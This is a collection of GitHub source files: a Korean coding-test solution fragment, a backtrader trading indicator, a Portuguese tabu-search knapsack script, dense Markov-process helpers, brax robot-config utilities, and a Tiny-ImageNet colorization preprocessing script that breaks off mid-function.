1을 더한걸 heappush로 넣어준다.\n heappush(work,heappop(work)+1)\n # 만약 가장 큰 원소가 양수라면(실제 음수)\n if work[-1]>0:\n # 0 반환\n return 0\n \n # 전체 원소의 제곱의 합을 반환\n return sum(i**2 for i in work)\n","repo_name":"SonJinHYo/CodingTest","sub_path":"프로그래머스/lv3/12927. 야근 지수/야근 지수.py","file_name":"야근 지수.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11310821636","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 6 11:30:09 2020\n\n@author: harsh\n\"\"\"\n\nimport backtrader as bt\nimport backtrader.indicators as btind\n\nfrom spe.cust_ind import RSC\n\nclass rscu(bt.Indicator):\n '''\n '''\n\n lines = ('hrscu','lrscu','hrscd','lrscd')\n params = (\n ('rscma_period',10),\n )\n plotlines=dict(\n hrscu=dict(color='green'),\n lrscu=dict(color='green'),\n hrscd=dict(color='red'),\n lrscd=dict(color='red')\n )\n \n def log(self, txt, dt=None):\n ''' Logging function fot this strategy'''\n dt = dt or self.data.datetime[0]\n if isinstance(dt, float):\n dt = bt.num2date(dt)\n print('%s, %s' % (dt.isoformat(), txt))\n \n def __init__(self):\n \n self.rsc = RSC.rsc(self.data0,self.data1,subplot=True)\n \n self.rscma = btind.SMA(self.rsc,period=self.p.rscma_period,subplot=True)\n \n self.rsccu_cond = btind.crossover.CrossUp(self.rsc, self.rscma)\n self.rsccd_cond = btind.crossover.CrossDown(self.rsc, self.rscma)\n\n # self.plotlines.hrscu._plotskip = True\n self.plotlines.lrscu._plotskip = True\n self.plotlines.hrscd._plotskip = True\n # self.plotlines.lrscd._plotskip = True\n \n def next(self):\n \n self.lines.hrscu[0] = self.lines.hrscu[-1]\n self.lines.lrscu[0] = self.lines.lrscu[-1]\n self.lines.hrscd[0] = self.lines.hrscd[-1]\n self.lines.lrscd[0] = self.lines.lrscd[-1] \n \n if self.rsccu_cond :\n # self.log(f'Cross Up condition met, High Value {self.data0.high[0]}')\n self.lines.hrscu[0] = self.data0.high[0]\n self.lines.lrscu[0] = self.data0.low[0] \n \n if self.rsccd_cond :\n # self.log(f'Cross Down condition met, High Value {self.data0.high[0]}')\n self.lines.hrscd[0] = self.data0.high[0]\n self.lines.lrscd[0] = self.data0.low[0] \n \n\n ","repo_name":"iamclearmind/webAppBackend","sub_path":"spe/cust_ind/rscu.py","file_name":"rscu.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22242529865","text":"# Busca tabu para resolver o problema da mochila\n\n\nimport random\n\n\n\"\"\"\nconfiguração da mochila\npara cada sublista, o primeiro elemento é o peso\ne o segundo elemento é o benefício\n\"\"\"\n\n\ndef obter_avaliacao(melhor_solucao, mochila, capacidade_maxima):\n somatorio_peso, somatorio_beneficio = 0, 0\n\n for i in range(len(melhor_solucao)):\n somatorio_peso += melhor_solucao[i] * mochila[i][0]\n somatorio_beneficio += melhor_solucao[i] * mochila[i][1]\n avaviacao = somatorio_beneficio * (1 - max(0, somatorio_peso - capacidade_maxima))\n\n return avaviacao\n\n\ndef obter_peso(solucao, mochila):\n peso = 0\n for i in range(len(solucao)):\n peso += solucao[i] * mochila[i][0]\n return peso\n\n\ndef gerar_vizinhos(melhor_solucao, max_vizinhos):\n vizinhos = []\n pos = 0\n for i in range(max_vizinhos):\n vizinho = []\n for j in range(len(melhor_solucao)):\n if j == pos:\n if melhor_solucao[j] == 0:\n vizinho.append(1)\n else:\n vizinho.append(0)\n else:\n vizinho.append(melhor_solucao[j])\n vizinhos.append(vizinho)\n pos += 1\n return vizinhos\n\n\ndef obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos):\n vizinhos_avaliacao = []\n for i in range(max_vizinho):\n vizinhos_avaliacao.append(obter_avaliacao(vizinhos[i], mochila, capacidade_maxima))\n return vizinhos_avaliacao\n\n\ndef obter_bit_modificado(melhor_solucao, melhor_vizinho):\n for i in range(len(melhor_solucao)):\n if melhor_solucao[i] != melhor_vizinho[i]:\n return i\n\n\ndef obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos):\n maxima_avaliacao = max(vizinhos_avaliacao)\n pos = 0\n bit_proibido = -1\n\n if len(lista_tabu) != 0:\n bit_proibido = lista_tabu[0]\n\n for i in range(len(vizinhos_avaliacao)):\n if vizinhos_avaliacao[i] == maxima_avaliacao:\n pos = i\n break\n\n if bit_proibido != -1:\n bit_pos = obter_bit_modificado(melhor_solucao, vizinhos[pos])\n\n if bit_pos == bit_proibido:\n melhor_pos = 0\n for i in range(len(vizinhos_avaliacao)):\n if i != bit_pos:\n if vizinhos_avaliacao[i] > vizinhos_avaliacao[melhor_pos]:\n melhor_pos = i\n return melhor_pos\n\n return pos\n\n\nmochila = [[4, 2], [5, 2], [7, 3], [9, 4], [6, 4]]\n\niteracao, melhor_iteracao = 0, 0\nmelhor_solucao = [] # Guarda a melhor solução\nlista_tabu = [] # lista tabu\ncapacidade_maxima = 23 # capacidade máxima da mochila\nbt_max = 1 # quantidade máxima de iterações sem melhora no valor da melhor solução\nmax_vizinho = 5 # quantidade máxima de vizinhos\n\nfor i in range(len(mochila)):\n bit = random.randint(0, 1)\n melhor_solucao.append(bit)\n\nprint('Solução inicial: {0}, Avaliação: {1}'.format(melhor_solucao,\n obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))\npeso_corrente = obter_peso(melhor_solucao, mochila)\nmelhor_avaliacao = obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)\nvizinhos = gerar_vizinhos(melhor_solucao, max_vizinho)\nprint('vizinhos', vizinhos)\nvizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinho)\npos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)\n\nif vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:\n bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])\n lista_tabu.append(bit_modificado)\n melhor_solucao = vizinhos[pos_melhor_vizinho][:]\n melhor_iteracao += 1\n\niteracao += 1\n\nwhile (iteracao - melhor_iteracao) < bt_max:\n \"\"\"\n A condição de parada é se a diferença entre a iteraçaão e a melhor iteração\n for maior que bt_max. A iteração global (sempre é incrementada).\n melhor_iteração é a iteração onde se achou a melhor solução (nem sempre é incrementada).\n bt_max é o máximo de iterações sem melhora no valor da melhor solução.\n \"\"\"\n print('vizinhos', vizinhos)\n vizinhos = gerar_vizinhos(melhor_solucao, max_vizinho)[:]\n vizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinho)[:]\n pos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)\n\n if vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:\n bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])\n lista_tabu[0] = bit_modificado\n melhor_solucao = vizinhos[pos_melhor_vizinho][:]\n melhor_avaliacao = vizinhos_avaliacao[pos_melhor_vizinho]\n melhor_iteracao += 1\n\n iteracao += 1\n\nprint('Solução inicial: {0}, Avaliação: {1}'.format(melhor_solucao,\n obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))\nprint('Melhor iteração: {0}'.format(melhor_iteracao))\nprint('Iteração: {0}'. format(iteracao))\n","repo_name":"thcborges/estrutura-de-dados-com-python3","sub_path":"Algoritmos_e_Estrutura_de_Dados/tabu_mochila.py","file_name":"tabu_mochila.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"2110007505","text":"\"\"\"\nHelper functions for analytically computing expectations.\n\nThese helper functions are for the dense compound process,\nand this module is not necessary for Rao-Teh sampling\nor for the analysis of the track histories sampled using Rao-Teh\nstochastic mapping.\n\nThis module should possibly be moved elsewhere.\nThe nxblink package is focused on analysis of sparse matrices\nusing networkx structures and algorithms, whereas a more appropriate package\nfor this module would use numpy and scipy structures and algorithms\nto analyze dense rate matrices, transition matrices, and distributions.\n\nThis module does not need to care about piecewise homogeneity of the process.\n\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\nfrom itertools import product\nfrom collections import namedtuple\n\nimport networkx as nx\nimport numpy as np\nimport scipy.linalg\n\nfrom .util import hamming_distance\nfrom .compound import State, compound_state_is_ok\n\n\n__all__ = [\n 'get_compound_states',\n 'define_compound_process', 'get_expected_rate', 'nx_to_np',\n 'nx_to_np_rate_matrix', 'np_to_nx_transition_matrix',\n 'compute_edge_expectation', 'compute_dwell_times',\n ]\n\n\ndef get_compound_states():\n \"\"\"\n Helper function for dense rate matrices.\n\n Note that some of the compound states in this list may be infeasible.\n\n \"\"\"\n nprimary = 6\n\n # Define the name and state space of each subprocess.\n track_names = State._fields\n track_states = (\n range(nprimary),\n (0, 1),\n (0, 1),\n (0, 1),\n )\n\n # The compound state space is the cartesian product\n # of subprocess state spaces.\n compound_states = [State(*x) for x in product(*track_states)]\n\n # Return the ordered compound states.\n return compound_states\n\n\ndef define_compound_process(Q_primary, compound_states, primary_to_tol):\n \"\"\"\n Compute indicator matrices for the compound process.\n\n \"\"\"\n n = len(compound_states)\n\n # define some dense indicator matrices\n I_syn = np.zeros((n, n), dtype=float)\n I_non = np.zeros((n, n), dtype=float)\n I_on = np.zeros((n, n), dtype=float)\n I_off = np.zeros((n, n), dtype=float)\n\n for i, sa in enumerate(compound_states):\n\n # skip compound states that have zero probability\n if not compound_state_is_ok(primary_to_tol, sa):\n continue\n\n for j, sb in enumerate(compound_states):\n\n # skip compound states that have zero probability\n if not compound_state_is_ok(primary_to_tol, sb):\n continue\n\n # if hamming distance between compound states is not 1 then skip\n if hamming_distance(sa, sb) != 1:\n continue\n\n # if a primary transition is not allowed then skip\n if sa.P != sb.P and not Q_primary.has_edge(sa.P, sb.P):\n continue\n\n # set the indicator according to the transition type\n if sa.P != sb.P:\n if primary_to_tol[sa.P] == primary_to_tol[sb.P]:\n I_syn[i, j] = 1\n else:\n I_non[i, j] = 1\n else:\n diff = sum(sb) - sum(sa)\n if diff == 1:\n I_on[i, j] = 1\n elif diff == -1:\n I_off[i, j] = 1\n else:\n raise Exception\n\n return I_syn, I_non, I_on, I_off\n\n\ndef get_expected_rate(Q_dense, dense_distn):\n return -np.dot(np.diag(Q_dense), dense_distn)\n\n\ndef nx_to_np(M_nx, ordered_states):\n state_to_idx = dict((s, i) for i, s in enumerate(ordered_states))\n nstates = len(ordered_states)\n M_np = np.zeros((nstates, nstates))\n for sa, sb in M_nx.edges():\n i = state_to_idx[sa]\n j = state_to_idx[sb]\n M_np[i, j] = M_nx[sa][sb]['weight']\n return M_np\n\n\ndef nx_to_np_rate_matrix(Q_nx, ordered_states):\n Q_np = nx_to_np(Q_nx, ordered_states)\n row_sums = np.sum(Q_np, axis=1)\n Q_np = Q_np - np.diag(row_sums)\n return Q_np\n\n\ndef np_to_nx_transition_matrix(P_np, ordered_states):\n P_nx = nx.DiGraph()\n for i, sa in enumerate(ordered_states):\n for j, sb in enumerate(ordered_states):\n p = P_np[i, j]\n if p:\n P_nx.add_edge(sa, sb, weight=p)\n return P_nx\n\n\ndef compute_edge_expectation(Q, P, J, indicator, t):\n # Q is the rate matrix\n # P is the conditional transition matrix\n # J is the joint distribution matrix\n ncompound = Q.shape[0]\n E = Q * indicator\n interact = scipy.linalg.expm_frechet(Q*t, E*t, compute_expm=False)\n total = 0\n for i in range(ncompound):\n for j in range(ncompound):\n if J[i, j]:\n total += J[i, j] * interact[i, j] / P[i, j]\n return total\n\n\ndef compute_dwell_times(Q, P, J, indicator, t):\n # Q is the rate matrix\n # P is the conditional transition matrix\n # J is the joint distribution matrix\n # the indicator is a dense 1d vector\n ncompound = Q.shape[0]\n E = np.diag(indicator)\n interact = scipy.linalg.expm_frechet(Q*t, E*t, compute_expm=False)\n total = 0\n for i in range(ncompound):\n for j in range(ncompound):\n if J[i, j]:\n total += J[i, j] * interact[i, j] / P[i, j]\n return total\n\n\n","repo_name":"argriffing/nxblink","sub_path":"nxblink/denseutil.py","file_name":"denseutil.py","file_ext":"py","file_size_in_byte":5312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35068444484","text":"import brax\nfrom brax.io import file\nfrom google.protobuf import text_format\nimport numpy as np\n\n\ndef get_config(config_name: str):\n config_path = f\"./procedural_envs/components/unimal_configs/{config_name}.txt\"\n with file.File(config_path) as f:\n _SYSTEM_CONFIG = f.read()\n f.close()\n return _SYSTEM_CONFIG\n\n\n# detect end effectors\ndef get_end_effectors(config_name: str):\n config_path = f\"./procedural_envs/components/unimal_configs/{config_name}.txt\"\n with file.File(config_path) as f:\n _SYSTEM_CONFIG = f.read()\n f.close()\n config = text_format.Parse(_SYSTEM_CONFIG, brax.Config())\n collides = set([b.name for b in config.bodies])\n parents = set()\n for j in config.joints:\n parents.add(j.parent)\n end_effectors = list(collides - parents)\n return end_effectors\n\n\n# get all bodies\ndef get_all_bodies(config_name: str):\n config_path = f\"./procedural_envs/components/unimal_configs/{config_name}.txt\"\n with file.File(config_path) as f:\n _SYSTEM_CONFIG = f.read()\n f.close()\n config = text_format.Parse(_SYSTEM_CONFIG, brax.Config())\n collides = [b.name for b in config.bodies]\n return collides\n\n\ndef get_agent_names():\n a = np.loadtxt(\"./procedural_envs/components/unimal_configs/agent_list.csv\", delimiter=',', skiprows=1, dtype='str', usecols=[3])\n return a.tolist()\n","repo_name":"frt03/mxt_bench","sub_path":"mxt_bench/procedural_envs/misc/unimal_utils.py","file_name":"unimal_utils.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"23109054181","text":"import pickle\nimport os\n\nimport numpy as np\n\nif __name__ == '__main__' or __name__ == 'keras_util':\n import image_util\n import constants as c\nelse:\n from . import image_util\n from . import constants as c\n\nimport tensorflow as tf\n\n\n################################################################################\n# stores paths to tiny-imagenet files as pickled arrays. These arrays\n# are expected as input 'data_paths' in the DataGenerator above\n\n\ndef is_grey_image(fn):\n img = image_util.read_image(fn)\n return img.shape == (64, 64)\n\n\ndef generate_data_paths_and_pickle():\n '''\n Create a list of the path to the images for the training set, validation set and test set\n '''\n\n image_extension = \".JPEG\"\n\n # Training set\n rootdir = \"../data/tiny-imagenet-200/train\"\n train_ids = []\n\n for subdirs, dirs, files in os.walk(rootdir):\n for file in files:\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n train_ids.append(path)\n\n with open('./saved_objects/train_ids.pickle', 'wb') as fp:\n pickle.dump(train_ids, fp)\n print('There are', len(train_ids), 'samples in trainng')\n\n print(\"created training id's\")\n\n # validation set\n rootdir = \"../data/tiny-imagenet-200/val\"\n validation_ids = []\n for subdirs, dirs, files in os.walk(rootdir):\n for file in files:\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n validation_ids.append(path)\n\n with open('./saved_objects/validation_ids.pickle', 'wb') as fp:\n pickle.dump(validation_ids, fp)\n\n print(\"created validation id's\")\n\n # Test set\n rootdir = \"../data/tiny-imagenet-200/test\"\n\n test_ids = []\n for subdirs, dirs, files in os.walk(rootdir):\n for file in files:\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n test_ids.append(path)\n\n with open('./saved_objects/test_ids.pickle', 'wb') as fp:\n pickle.dump(test_ids, fp)\n\n print(\"created test id's\")\n\n\n################################################################################\n# Create soft_encode\n# Aiming to accelerate training\n#\n\nlab_bin_centers = c.lab_bin_centers\n\n\ndef load_keys():\n '''\n This function loads the file keeping track of the labels of the image\n key - > numerical value of the file (also the name of the folder they are in)\n value - > text value of the file\n '''\n label_path = \"../data/tiny-imagenet-200/words.txt\"\n keys = {}\n with open(label_path) as f:\n for line in f:\n key, val = line.split('\\t')\n keys[key] = val\n return keys\n\n\ndef load_validation_keys():\n '''\n This function loads the file keeping track of the labels of the image\n key - > numerical value of the file (also the name of the folder they are in)\n value - > text value of the file\n '''\n label_path = \"../data/tiny-imagenet-200/val/val_annotations.txt\"\n keys = {}\n with open(label_path) as f:\n for line in f:\n key, val, _, _, _, _ = line.split('\\t')\n keys[key] = val\n return keys\n\n\ndef get_available_classes():\n file_counter = 0\n labels = load_keys()\n train_path = \"../data/tiny-imagenet-200/train\"\n counter_gray = 0\n\n for subdirs, dirs, files in os.walk(train_path):\n if len(files) == 500:\n file_counter += 1\n\n label = files[0][:9]\n label_name = labels[label]\n print(file_counter, ': ', label_name, '->', label)\n\n\ndef get_tinytiny_dataset():\n tiny_classes = [\n 'n01443537', 'n01910747', 'n01917289', 'n01950731', 'n02074367', 'n09256479', 'n02321529',\n 'n01855672', 'n02002724', 'n02056570', 'n02058221', 'n02085620', 'n02094433', 'n02099601', 'n02099712',\n 'n02106662', 'n02113799', 'n02123045', 'n02123394', 'n02124075', 'n02125311', 'n02129165', 'n02132136',\n 'n02480495', 'n02481823', 'n12267677', 'n01983481', 'n01984695', 'n02802426', 'n01641577'\n ]\n\n image_extension = \".JPEG\"\n\n # Training set\n rootdir = \"../data/tiny-imagenet-200/train\"\n train_ids = []\n for subdirs, dirs, files in os.walk(rootdir):\n if len(files) == 500 and files[0][:9] in tiny_classes:\n for file in files:\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n train_ids.append(path)\n with open('./train_ids_tiny.pickle', 'wb') as fp:\n pickle.dump(train_ids, fp)\n\n print(\"created training id's\")\n\n # # validation set\n rootdir = \"../data/tiny-imagenet-200/val\"\n valkeys = load_validation_keys()\n validation_ids = []\n print('test')\n for subdirs, dirs, files in os.walk(rootdir):\n for file in files:\n if os.path.splitext(file)[1] == image_extension and valkeys[file] in tiny_classes:\n # print(file)\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n validation_ids.append(path)\n\n with open('./validation_ids_tiny.pickle', 'wb') as fp:\n pickle.dump(validation_ids, fp)\n\n print(\"created validation id's\")\n #\n # # Test set -> Isn't annotated should still do ?\n rootdir = \"../data/tiny-imagenet-200/test\"\n\n test_ids = []\n for subdirs, dirs, files in os.walk(rootdir):\n for file in files:\n path = os.path.join(subdirs, file).replace('\\\\', '/')\n if os.path.splitext(file)[1] == image_extension and \\\n not is_grey_image(path):\n test_ids.append(path)\n #\n with open('./test_ids_tiny.pickle', 'wb') as fp:\n pickle.dump(test_ids, fp)\n #\n print(\"created test id's\")\n\n\ndef save_soft_encode(path):\n image = image_util.read_image(path)\n lab = image_util.convert_rgb_to_lab(image)\n se = image_util.soft_encode_lab_img(lab)\n new_path = '../data/soft_encoded/' + path[-16:-5] + '_soft_encoded.npz'\n np.savez_compressed(new_path, se)\n return new_path\n\n\ndef save_softencode_ondisk():\n # with open('./done_train_ids_tiny.pickle', 'rb') as fp:\n # done = pickle.load(fp)\n #\n # with open('../train_ids_soft_encoded.pickle', 'rb') as fp:\n # train_paths = pickle.load(fp)\n # i = 0\n # with open('./train_ids_tiny.pickle', 'rb') as fp:\n # train_ids = pickle.load(fp)\n # print('There are currently', len(train_ids), 'images in the training set')\n # for path in train_ids:\n # if i % 1000 == 0:\n # print('Saved ', i, 'documents')\n # namepath = path[49:-5]\n # if namepath not in done:\n # new_path = save_soft_encode(path, namepath)\n # train_paths.append(new_path)\n # i += 1\n\n # with open('../train_ids_soft_encoded.pickle', 'wb') as fp:\n # pickle.dump(train_paths, fp)\n # print('Soft encoded training done')\n\n validation_paths = []\n # i = 0\n # with open('./validation_ids_tiny.pickle', 'rb') as fp:\n # validation_ids = pickle.load(fp)\n # print('There are currently', len(validation_ids), 'images in the validation set')\n # for path in validation_ids:\n # if i % 1000 == 0:\n # print('Saved', i, 'documents')\n # i+=1\n # namepath = path[37:-5]\n # new_path = save_soft_encode(path, namepath)\n # validation_ids.append(new_path)\n\n # with open('../validation_ids_soft_encoded.pickle', 'wb') as fp:\n # pickle.dump(validation_paths, fp)\n # print('Soft encoded validation ids done!')\n #\n test_paths = []\n i = 0\n with open('./test_ids_tiny.pickle', 'rb') as fp:\n test_ids = pickle.load(fp)\n print('There are currently', len(test_ids), 'images in the test set')\n for path in test_ids:\n if i % 1000 == 0:\n print('Saved', i, 'documents')\n i += 1\n new_path = save_soft_encode(path)\n test_paths.append(new_path)\n\n with open('../test_ids_soft_encoded.pickle', 'wb') as fp:\n pickle.dump(test_paths, fp)\n\n print('Soft encoded test done!')\n\n\ndef count_number_of_images():\n with open('../train_ids_soft_encoded.pickle', 'rb') as fp:\n train_paths = pickle.load(fp)\n print(\"Number of training images: \", len(train_paths))\n\n with open('../validation_ids_soft_encoded.pickle', 'rb') as fp:\n validation_paths = pickle.load(fp)\n print(\"Number of validation images: \", len(validation_paths))\n\n with open('../test_ids_soft_encoded.pickle', 'rb') as fp:\n test_paths = pickle.load(fp)\n print(\"Number of training images: \", len(test_paths))\n\n################################################################################\n# Create compressed tensor record data\n#\n\ndef create_id_labels():\n '''\n Create files to map labels to their name labels, and to an arbitraty id from 0 to 200\n :return:\n '''\n keys = load_keys()\n label_path = \"../data/tiny-imagenet-200/wnids.txt\"\n labels = []\n with open(label_path) as f:\n for line in f:\n labels.append(line.split('\\n')[0])\n\n id_label = {}\n label_id = {}\n label_name = {}\n\n for i, label in enumerate(labels):\n name = keys[label]\n id_label[i] = label\n label_id[label] = i\n label_name[label] = name\n print('Label', label, 'coressponds to', name, 'with class', i)\n\n\ndef wrap_int64(value):\n '''\n :param value:\n :return: returns a list of number into a tfrecord object\n '''\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef wrap_bytes(value):\n '''\n\n :param value:\n :return: returns a list of object into a tfrecord object\n '''\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef convert(image_paths, out_path):\n '''\n This functions creates tf record object.\n Inputs are the paths to the rgb pictures. This functions saves\n the different images in their cielab format and in their soft encoded format\n :param image_path: Path to the images to convert into a tfrecord object\n :param out_path: Path where to save the tfrecord object\n :return:\n '''\n\n print(\"Converting: \" + out_path)\n # Number of images. Used when printing the progress.\n num_images = len(image_paths)\n\n # Open a TFRecordWriter for the output-file.\n with tf.python_io.TFRecordWriter(out_path) as writer:\n # Iterate over all the image-paths\n for i, path in enumerate(image_paths):\n if i % 1000 == 0:\n print('Serialised ', i, 'files')\n # Read the images\n rgb = np.array(image_util.read_image(path))\n cie = np.array(image_util.convert_rgb_to_lab(rgb))\n se = np.array(image_util.soft_encode_lab_img(cie))\n\n # Convert them into raw bytes\n cie_bytes = cie.tostring()\n se_bytes = se.tostring()\n\n # Create a dict with the data saved in the record files\n\n data = \\\n {\n 'cie': wrap_bytes(cie_bytes),\n 'label': wrap_bytes(se_bytes)\n }\n\n # Wrap the data as TensorFlow Features.\n feature = tf.train.Features(feature=data)\n\n # Wrap again as a TensorFlow Example.\n example = tf.train.Example(features=feature)\n\n # Serialize the data.\n serialized = example.SerializeToString()\n\n # Write the serialized data to the TFRecords file.\n writer.write(serialized)\n\n\ndef convert_dataset_into_tfrecord():\n training_ids = './saved_objects/train_ids.pickle'\n with open(training_ids, 'rb') as fp:\n training_paths = pickle.load(fp)\n print('There are', len(training_paths), 'samples in the training set')\n training_out = './saved_objects/train_alltiny_tfrecord.tfrecord'\n\n validation_ids = './saved_objects/test_ids.pickle'\n with open(validation_ids, 'rb') as fp:\n validation_paths = pickle.load(fp)\n print('There are', len(validation_paths), 'samples in the validation set')\n validation_out = './saved_objects/validation_alltiny_tfrecord.tfrecord'\n\n convert(training_paths, training_out)\n convert(validation_paths, validation_out)\n\ndef create_all_tf_records():\n # generate_data_paths_and_pickle()\n convert_dataset_into_tfrecord()\n\n\n################################################################################\n# Create compress objects for inputs and outputs\n#\n\n\ndef save_input_output(path, newpath):\n image = image_util.read_image(path)\n lab = image_util.convert_rgb_to_lab(image)\n se = image_util.soft_encode_lab_img(lab)\n\n new_path = newpath\n np.savez_compressed(new_path, input=lab, output=se)\n\n\ndef save_input_output_ondisk():\n # train_paths = []\n # i = 0\n # with open('./train_ids_tiny.pickle', 'rb') as fp:\n # train_ids = pickle.load(fp)\n # print('There are currently', len(train_ids), 'images in the training set')\n # for path in train_ids:\n # if i % 1000 == 0:\n # print('Saved ', i, 'documents')\n # namepath = 'train/' + path[49:-5]\n # new_path = save_input_output(path, namepath)\n # train_paths.append(new_path)\n # i += 1\n #\n # with open('../train_ids_npz.pickle', 'wb') as fp:\n # pickle.dump(train_paths, fp)\n # print('Soft encoded training done')\n #\n validation_paths = []\n i = 0\n with open('./validation_ids_tiny.pickle', 'rb') as fp:\n validation_ids = pickle.load(fp)\n print('There are currently', len(validation_ids), 'images in the validation set')\n for path in validation_ids:\n if i % 1000 == 0:\n print('Saved', i, 'documents')\n i += 1\n namepath = 'val/' + path[37:-5]\n # new_path = save_input_output(path, namepath)\n new_path = '../data/npz-tiny-imagenet/' + namepath + '_intput_output.npz'\n validation_ids.append(new_path)\n\n with open('../validation_ids_npz.pickle', 'wb') as fp:\n pickle.dump(validation_paths, fp)\n # print('Soft encoded validation ids done!')\n\n test_paths = []\n i = 0\n with open('./test_ids_tiny.pickle', 'rb') as fp:\n test_ids = pickle.load(fp)\n print('There are currently', len(test_ids), 'images in the test set')\n for path in test_ids:\n if i % 1000 == 0:\n print('Saved', i, 'documents')\n i += 1\n name_path = 'test/' + path[38:-5]\n new_path = save_input_output(path, name_path)\n test_paths.append(new_path)\n #\n with open('../test_ids_npz.pickle', 'wb') as fp:\n pickle.dump(test_paths, fp)\n\n print('Soft encoded test done!')\n\n\n###############################################################################\n# Create dataset for the 2 class experiments\n# This experiment will consist in training 2 classes, each with the custom weights,\n# and with the other's custom weights\n#\ndef save_input_output_2classes(path, newpath):\n image = image_util.read_image(path)\n lab = image_util.convert_rgb_to_lab(image)\n se = image_util.soft_encode_lab_img(lab)\n\n new_path = newpath\n np.savez_compressed(new_path, input=lab, output=se)\n\ndef create_twoclasses_id():\n classes = ['n01443537', 'n02099712']\n root_dir = '../data/tiny-imagenet-200/train/'\n\n train_ids = {}\n validation_ids = {}\n\n for cur_class in classes:\n dir_path = root_dir + cur_class + '/images/'\n train_ids[cur_class] = []\n for subdir, dir, files in os.walk(dir_path):\n for file in files:\n path = os.path.join(dir_path, file).replace('\\\\', '/')\n if path.split('.')[-1] == \"JPEG\" and not is_grey_image(path):\n train_ids[cur_class].append(path)\n\n print('Number of training ids for fish', len(train_ids[classes[0]]))\n with open('./saved_objects/train_ids_fish_uncompressed.pickle', 'wb') as fp:\n pickle.dump(train_ids[classes[0]], fp)\n print('Number of training ids for dog', len(train_ids[classes[1]]))\n with open('./saved_objects/train_ids_dog_uncompressed.pickle', 'wb') as fp:\n pickle.dump(train_ids[classes[1]], fp)\n\n\n val_keys = load_validation_keys()\n root_dir = \"../data/tiny-imagenet-200/val/images/\"\n\n validation_ids[classes[0]] = []\n validation_ids[classes[1]] = []\n for image in val_keys:\n if val_keys[image] in classes[0]:\n path = os.path.join(root_dir, image).replace('\\\\', '/')\n validation_ids[classes[0]].append(path)\n elif val_keys[image] in classes[1]:\n path = os.path.join(root_dir, image).replace('\\\\', '/')\n validation_ids[classes[1]].append(path)\n\n print('Number of validation ids for fish', len(validation_ids[classes[0]]))\n with open('./saved_objects/validation_ids_fish_uncompressed.pickle', 'wb') as fp:\n pickle.dump(validation_ids[classes[0]], fp)\n print('Number of validation ids for dog', len(validation_ids[classes[1]]))\n with open('./saved_objects/validation_ids_dog_uncompressed.pickle', 'wb') as fp:\n pickle.dump(validation_ids[classes[1]], fp)\n\ndef save_twoclasses_npz():\n train_dir = './saved_objects/train_ids_'\n validation_dir = './saved_objects/validation_ids_'\n output_dir = '../data/2classes/'\n classes = ['fish', 'dog']\n\n training_ids_npz = {}\n validation_ids_npz = {}\n\n train_output_dir = output_dir + 'train/'\n for i in range(len(classes)):\n path_in = train_dir + classes[i] + '_uncompressed.pickle'\n training_ids_npz[classes[i]] = []\n with open(path_in, 'rb') as fp:\n ids = pickle.load(fp)\n\n for image in ids:\n newname = image.split('/')[-1].split('.')[0]\n newpath = train_output_dir + newname + '.npz'\n training_ids_npz[classes[i]].append(newpath)\n save_input_output_2classes(image, newpath)\n\n direc = train_dir + classes[i] + '.pickle'\n print(direc, 'has length', len(training_ids_npz[classes[0]]))\n with open(direc, 'wb') as fp:\n pickle.dump(training_ids_npz[classes[i]], fp)\n\n\n validation_output_dir = output_dir + 'val/'\n for i in range(len(classes)):\n path_in = validation_dir + classes[i] + '_uncompressed.pickle'\n validation_ids_npz[classes[i]] = []\n with open(path_in, 'rb') as fp:\n ids = pickle.load(fp)\n\n for image in ids:\n newname = image.split('/')[-1].split('.')[0]\n newpath = validation_output_dir + newname + '.npz'\n validation_ids_npz[classes[i]].append(newpath)\n save_input_output_2classes(image, newpath)\n\n direc = validation_dir + classes[i] + '.pickle'\n print(direc, 'has length', len(validation_ids_npz[classes[0]]))\n with open(direc, 'wb') as fp:\n pickle.dump(validation_ids_npz[classes[i]], fp)\n\n\ndef create_twoclasses_dataset():\n # create_twoclasses_id()\n 